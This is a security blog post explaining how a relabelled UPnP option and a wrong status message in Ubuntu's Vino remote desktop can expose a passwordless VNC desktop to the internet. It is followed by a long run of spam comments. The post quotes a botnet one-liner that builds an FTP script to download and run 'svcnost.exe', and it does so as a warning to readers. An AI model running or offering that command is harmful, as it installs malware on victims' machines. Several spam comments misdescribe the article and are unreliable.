This post highlights how even a small modification to a graphical user interface can be responsible for causing unintended security problems.
When Ubuntu's remote desktop service (Vino) first introduced support for UPnP, this is what the Security section of new configuration dialog looked like:
The UPnP feature was activated by checking "Talk to the router and try to open the doors there". Although this label was criticised for sounding too informal, it did actually give a reasonable impression of what might happen if you checked the box. Namely, it used UPnP to configure the router such that the remote desktop service could be accessed from the internet.
However, this is what the option now looks like in the current Long Term Support version of Ubuntu (10.04.3 LTS, Lucid Lynx):
(This is a screenshot from a real victim of the problem I am about to describe)
Notice that this unfortunate user has enabled remote control of their desktop, with no password protection. What was possibly going through their mind? Well, convenience, most likely. Indeed, the lack of password may not necessarily pose any security problems if the Ubuntu desktop is on a trusted network and not connected directly to the internet. This would be typical of many home networks, where internet access is usually provided by a NAT-enabled router.
But also notice that the UPnP option is now labelled "Configure network automatically to accept connections". The user has checked this box - after all, why wouldn't you want a connection to be accepted automatically? Convenience is the goal here, and there is nothing to suggest that this option really means "accept connections from the entire internet".
So, after checking the box, the user's UPnP-enabled router will start to accept connections from the internet on port 5900 and forward them to the Ubuntu desktop. Even so, the settings dialog reassuringly and erroneously states that "Your desktop is only reachable over the local network." The combination of this bug and the slightly unclear option label has caused the user to accidentally open the doors on their Ubuntu desktop. To anyone.
Anybody in the world can now use this person's computer simply by using a VNC client to connect to the public-facing IP address of the router (no password required, of course).
Internet-facing VNC servers are often subjected to automated attacks from botnets, but vino-server's lack of connection logging might make these hard to trace after the event. Thankfully, most of the automated attacks happening right now are only designed to exploit Windows systems. You may, for example, notice attacks similar to the following, which launch a command prompt and create a temporary FTP script named "ik", which is then used to download and execute malware:
cmd /c echo open example.com 21 >> ik &echo user xyz letmein >> ik &echo binary >> ik &echo get svcnost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svcnost.exe &exit
echo You got owned
The botnet simply connects to an exposed VNC server and sends these characters to the remote Windows computer. Quite cheeky, but at least it has the decency to tell the user they got owned!
Are you affected by this? If you have enabled remote desktop or vino-server on any version of Ubuntu or Windows, you should probably double check that you haven't inadvertently exposed the service to the entire internet. If you do wish for the service to be internet visible, ensure that you use a suitably strong password and keep your server software up to date.
now present in your city
ReplyDeleteThat's why, if you fall into this category, you'll need someone to keep an eye on your kids wherever they are. The person you choose to take care of your children should be trustworthy and honest.security services in London We've heard of cases where caretakers liaise with kidnappers to abduct children. You don't want to fall victim to such a racket. UK Close Protection Services are specialists in child protection. When you hire us, we'll provide you with armed and unarmed bodyguards to protect your family against any harm or kidnap.
ReplyDelete"Can I simply just say what a relief to find a person that genuinely understands what they are talking about on the internet.
ReplyDeleteYou definitely know how to bring an issue to light and make it important.
A lot more people ought to check this out and understand
this side of your story. It's surprising you are not more popular because you definitely have the gift."
오피
It’s remarkable to go to see this web site and reading the views of all mates about this paragraph, while I am also eager of getting know-how.
ReplyDelete마사지
I’m impressed, I must say. I’m here for the first time. Superb! I simply must tell you that I really love your blogs page. My boyfriend enjoys your blogs.
ReplyDelete건전마사지
This comment has been removed by the author.
ReplyDeleteVery informative Blog! There is so much information here that can help thank you for sharing.
ReplyDeleteData Science Training in Lucknow
토토365프로
ReplyDelete스포츠토토
This was truly a useful publish. Thanks a lot
스포츠토토티비
ReplyDelete스포츠중계
This is a lovely post. I really appreciate your optimism and I agree with your post and looking forward for more post from you..
We are really grateful for your blog post. You will find a lot of approaches after visiting your post. Great work thank you.
ReplyDeleteBusiness Analytics Course in Chandigarh
Give the privilege of being a member until it makes people who are interested are widespread and come to apply for membership on the web without interruption. Don't hesitate to apply for membership today. Million dollar slots are waiting for you. Ak88king
ReplyDeleteoncasino
ReplyDeleteHit on a Soft 17 - A lot of players make this mistake because of|as a end result of} the general rule is to Stand on Hard 17. However on a Soft 17 , the Ace makes all of the difference. When you 우리계열 imagine that your whole will beat the dealer's whole. "Change please" - This is a method of asking the dealer to transform your cash into taking part in} chips.
ReplyDeleteRely on the Best Local SEO services in India by Divine Soft Technology and get stay on the top of the search results. Ours is an SEO company in Delhi that works to get you prominence online.
ReplyDeleteThanks for bringing alert to readers especially ubuntu users. Small changes will make much difference coding related OS such as Ubuntu. It's really nice to bring this beautiful article for us. Thanks for sharing and keep sharing more related blogs. Traffic Lawyer Alleghany Virginia
ReplyDeleteThanks for sharing this wonderful blog. Best CRM Software for Marketing in 2023
ReplyDeleteI always looking for a blog that is related to my problem and then I found this. Fence Company Spring Hill, FL
ReplyDeleteare you the same guy who wrote IRC Hacks? it's my favourite book for bedtime reading <3
ReplyDeleteWow Excellent post ! an amazing article, I'd like to draft like this too-taking a time and real hardwork to make a great article, Its very easy for me to know about the topic and the undersand to content that resonates with them, Thanks for sharing your insights...
ReplyDeletehow long does an uncontested divorce take in virginia
Abogado De Divorcio En Virginia
I am genuinely thankful for the priceless insights you've shared in this blog post. Your thoughtful analysis and creative concepts have truly deepened my grasp of the topic. I wholeheartedly commend you for the dedication you've shown in crafting this enlightening article. I'm eagerly anticipating the wealth of knowledge I'll gain from your future posts.
ReplyDeleteDriving Suspended License Misdemeanor New Jersey
Accidentally opening doors on Ubuntu can be a frustrating experience for users unfamiliar with the operating system's intricacies. Ubuntu's interface, designed for efficiency and simplicity, can sometimes lead to unintended actions due to its sensitivity to various input methods. Users might inadvertently click or tap on icons, leading to applications or folders opening unexpectedly.
ReplyDeleteHow fast can you get a Divorce in New York
High Net Worth Divorce Attorney in New York
ley de divorcio nueva jersey
ReplyDeleteThe article "Accidentally opening the doors on Ubuntu" is a humorous and relatable exploration of unexpected tech challenges faced by users. It blends technical content with humor, making it an engaging and enjoyable read for Ubuntu users and tech enthusiasts. The article provides a witty perspective on the common tech hiccup, communicating frustration in a humorous way. It is a delightful read that combines technical details with humor, navigating unexpected challenges users might face. The article is a clever and entertaining piece, turning a common tech issue into a humorous narrative, making it a recommended read for those who appreciate a lighthearted take on technology mishaps.
You've done an incredible job with this website. I'll recommend it to my friends; they'll benefit from it for sure. Siding Installation Services Richmond, BC
ReplyDeletetruck accident lawyers
ReplyDeleteThe text provides a comprehensive guide on how users may accidentally open doors on Ubuntu. It includes a step-by-step guide on how to avoid such issues, along with visual aids like screenshots or video demonstrations. The guide also includes troubleshooting tips for users who encounter difficulties implementing suggested solutions. It also suggests preventive measures, such as user education or additional security measures, to minimize the likelihood of accidental door openings in the future. The guide encourages community engagement by inviting users to share their experiences and tips related to accidental door openings. A feedback loop is established to continuously refine and enhance the content. Finally, the guide provides links to additional resources or support channels for users to seek assistance.
Chiropractic credit card processing not only entices fresh patients but also enhances the overall patient experience. By enabling the acceptance of card payments, chiropractors can simplify the check-in and check-out procedure, minimizing wait times and administrative difficulties. This effectiveness resonates positively with patients.
ReplyDeleteBy utilizing advanced payment technology, chiropractors can accept payments through various channels, including in-person transactions, online payments, and even mobile payments. This flexibility allows chiropractic clinics to cater to the preferences of their patients and offer a convenient payment option that suits their needs.
The Decapinator offers excellent value for money, resulting in substantial time and cost savings for frequent users. Overall, the Decapinator is a reliable and efficient decapping solution for both hobbyists and professionals.
ReplyDeletetruck accident attorney near me A licensed professional, a lawyer advises and represents clients in a variety of legal matters, including criminal, family, personal injury, and business law. By educating people about their legal rights and options, representing them in court, settling disputes, preparing legal documents, conducting research, and standing up for their clients' interests, they play a critical role in society.
Thank you for sharing this fascinating information. Best of luck.
ReplyDeleteYour creative writing abilities inspired me to get my own blog now Thank you.
ReplyDeleteCool you write, the information is very good and interesting,
ReplyDeleteI like the helpful information that provide in articles. Keep doing it.
ReplyDeleteInteresting stuff in your blog. Its great article. Will look forward to read more articles...
ReplyDeleteHello! I was surprised to see your writing. This is a really useful resource.
ReplyDeleteOne of the most significant information for me. Thanks for a good points
ReplyDeleteYes i am totally agreed with this article and Excellent way of writing this issue
ReplyDeleteOn Ubuntu, it can be annoying to inadvertently unlock doors, especially when attempting to use the appropriate apps. Despite being user-friendly, the interface occasionally results in accidental clicks. Nonetheless, threats are reduced by the strong security features and adaptable settings. All things considered, Ubuntu is still a dependable operating system that strikes a balance between usability and essential security measures.The general law in the USA is a complex and evolving system rooted in both federal and state jurisdictions. It encompasses a wide range of legal principles, including constitutional, statutory, and case law. The system aims to balance individual rights with public order and safety. While it provides a framework for justice and legal processes, its complexity and variation across states can pose challenges. The ongoing development of laws reflects societal changes and strives to address contemporary issues, maintaining a dynamic legal landscape.
ReplyDeleteDui Lawyer King Georgia VA
I will support you. Such a very useful article. A must read post, Thanks a lot
ReplyDeleteThis is really Interesting, You’re a very skilled blogger. Keep it up for good post
ReplyDeleteThis is excellent blog here. A great read. Thank you for sharing this fascinating info
ReplyDeleteHigh Severity refers to issues or incidents that have a significant impact on systems, operations, or safety. These problems require immediate attention due to their potential to cause major disruptions, financial loss, or harm. In IT and software, high severity typically means critical system failures or security vulnerabilities. Quick resolution is essential to minimize damage and restore normal functionality.
ReplyDeleteFraud Lawyer
Forced Labor Law
Unless combined with marital assets, inheritance is independent property in New York and may be divided in the event of a divorce.
ReplyDeleteInheritance Divorce New York
This blog post provides a helpful and insightful guide on handling accidental window openings in Ubuntu. The explanation is clear and practical, making it easy for users to understand and apply the solutions. It’s great to see troubleshooting tips for common issues that Linux users might encounter. The step-by-step approach ensures that even less experienced users can follow along. Overall, a well-written and useful resource for Ubuntu users!
ReplyDeletetraffic lawyer hopewell va